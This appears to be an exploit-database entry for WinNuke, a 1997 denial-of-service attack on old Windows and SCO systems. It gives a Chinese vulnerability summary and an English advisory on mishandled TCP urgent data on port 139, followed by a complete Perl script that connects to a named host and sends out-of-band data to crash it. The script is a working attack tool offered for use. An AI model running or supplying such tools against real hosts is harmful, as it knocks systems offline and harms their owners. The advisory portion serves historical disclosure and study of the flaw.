https://www.exploit-db.com/exploits/20439
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-008

TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。一些老版本的Windows系统不能很好的处理TCP紧急数据，远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击，造成主机系统崩溃。1997年5月7号有人发布了一个winnuke.c。首先建立一条到Win95/NT主机的TCP连接，然后发送TCP紧急数据，导致系统崩溃。139/TCP是Win95/NT系统最常见的侦听端口，所以winnuke.c使用了该端口。之所以称呼这种攻击为OOB攻击，因为MSG_OOB标志，实际应该是TCP紧急数据攻击。<*链接：http://xforce.iss.net/static/173.phphttp://www.ciac.org/ciac/bulletins/h-57.shtml*>

source: http://www.securityfocus.com/bid/2010/info
  
Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.
  
According to Microsoft, "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow. "
  
As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.
  
Windows port 139 (NetBIOS) is most susceptible to this attack. although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning. 

#!/usr/bin/perl

# Ghent - [email protected] - Perl version of winnuke.c by _eci

use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);

$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.comn"; }

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;

print "Nuking: $h:$pn"; send S,"Sucker",MSG_OOB; print "Nuked!n"; close S;

来源:OSVDB
名称:1666
链接:http://www.osvdb.org/1666